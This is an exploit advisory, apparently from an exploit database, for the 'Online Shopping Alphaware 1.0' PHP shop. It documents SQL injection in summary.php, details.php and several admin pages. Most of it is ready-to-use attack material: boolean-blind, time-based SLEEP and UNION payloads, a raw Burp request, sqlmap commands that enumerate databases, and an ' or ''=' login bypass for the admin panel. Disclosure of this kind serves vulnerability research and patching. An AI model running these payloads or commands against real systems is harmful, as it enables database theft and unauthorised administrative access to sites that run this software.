## https://sploitus.com/exploit?id=PACKETSTORM:158779
# Exploit Title: Online Shopping Alphaware 1.0 - Multiple SQL Injection Vulnerabilities  
# Date: 2020-8-4  
# Exploit Author: Edo Maland  
# Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=14368&title=Online+Shopping+Alphaware+in+PHP%2FMysql  
# Version: 1.0  
# Tested on: Windows & Linux servers  
  
-------------------------------------------------------------------------------------------------------------------------------------  
  
# Vulnerable file: summary.php  
# Vulnerable parameter:  
- tid  
  
# PoC  
  
URL : http://example.com/alphaware/summary.php?tid=1337 [SQLi]  
  
# Burpsuite Requests  
  
GET /alphaware/summary.php?tid=-3488%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7171626a71%2C%28CASE%20WHEN%20%28VERSION%28%29%20LIKE%200x254d61726961444225%29%20THEN%201%20ELSE%200%20END%29%2C0x716b706b71%29%2CNULL%2CNULL--%20- HTTP/1.1  
Cache-control: no-cache  
User-agent: Mozilla/5.0 (X11; U; Linux x86_64; ja; rv:1.9.1.4) Gecko/20091016 SUSE/3.5.4-1.1.2 Firefox/3.5.4  
Cookie: PHPSESSID=tp5rtgrqhq6mtcgrlv2ouo583n  
Host: example.com  
Accept: */*  
Accept-encoding: gzip,deflate  
Connection: close  
  
  
# Payload  
  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: http://example.com/alphaware/summary.php?tid=73' AND 4766=4766 AND 'eIaZ'='eIaZ  
Vector: AND [INFERENCE]  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: http://example.com/alphaware/summary.php?tid=73' AND (SELECT 5482 FROM (SELECT(SLEEP(5)))PeLB) AND 'zQKr'='zQKr  
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 5 columns  
Payload: http://example.com/alphaware/summary.php?tid=-4244' UNION ALL SELECT NULL,NULL,CONCAT(0x7171626a71,0x6573676f5948464d524243677248444168457a566250595976774178415053687041507a69507642,0x716b706b71),NULL,NULL-- -  
Vector: UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL-- -  
  
  
  
# Sqlmap  
  
sqlmap -u "http://example.com/alphaware/summary.php?tid=1337*" --dbs --random-agent -v 3  
  
  
-------------------------------------------------------------------------------------------------------------------------------------  
  
# Vulnerable file: confirm.php  
# Vulnerable parameter:  
- id  
  
# PoC  
  
URL : http://example.com/alphaware/admin/confirm.php?id=0*[SQLi]  
  
  
# Payload  
  
Parameter: #1* (URI)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: http://example.com/alphaware/admin/confirm.php?id=0' AND (SELECT 1002 FROM (SELECT(SLEEP(5)))Yjjs) AND 'uFRa'='uFRa  
  
  
# Sqlmap  
  
  
sqlmap -u "http://example.com/alphaware/admin/confirm.php?id=0*" --dbs --random-agent -v 3  
  
-------------------------------------------------------------------------------------------------------------------------------------  
  
# Vulnerable file: details.php  
# Vulnerable parameter : id  
  
# PoC  
  
URL : http://example.com/alphaware/details.php?id=1337 [SQLi]  
  
  
# Payload  
  
Parameter: #1* (URI)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: http://example.com/alphaware/details.php?id=1337' AND (SELECT 6801 FROM (SELECT(SLEEP(5)))ogoi) AND 'vASd'='vASd  
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 7 columns  
Payload: http://example.com/alphaware/details.php?id=1337' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71766b7871,0x6350686f52454b775559486d4a456859414a61424a6c724b72624f6d4554555471764a4d724a726f,0x71716b7171),NULL,NULL-- -  
Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,[QUERY],NULL,NULL-- -  
  
# Sqlmap  
  
sqlmap -u "http://example.com/alphaware/details.php?id=1337*" --dbs --random-agent -v 3  
  
  
  
-------------------------------------------------------------------------------------------------------------------------------------  
  
# Vulnerable files: admin/confirm.php, admin/cancel.php, admin/receipt.php  
# Vulnerable parameters:  
- id (confirm.php, cancel.php); tid (receipt.php)  
  
# PoC  
  
URL :   
- http://example.com/alphaware/admin/confirm.php?id=0*[SQLi]  
- http://example.com/alphaware/admin/cancel.php?id=[SQLi]  
- http://example.com/alphaware/admin/receipt.php?tid=[SQLi]  
  
  
  
# Payload  
  
Parameter: #1* (URI)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: http://example.com/alphaware/admin/confirm.php?id=0' AND (SELECT 1002 FROM (SELECT(SLEEP(5)))Yjjs) AND 'uFRa'='uFRa  
  
  
# Sqlmap  
  
sqlmap -u "http://example.com/alphaware/admin/confirm.php?id=0*" --dbs --random-agent -v 3  
  
  
  
-------------------------------------------------------------------------------------------------------------------------------------  
  
URL : http://example.com/alphaware/admin/  
  
Authentication bypass via SQL injection in the Admin/Member login form  
  
Log in with the following credentials:  
Username : ' or ''='  
Password : ' or ''='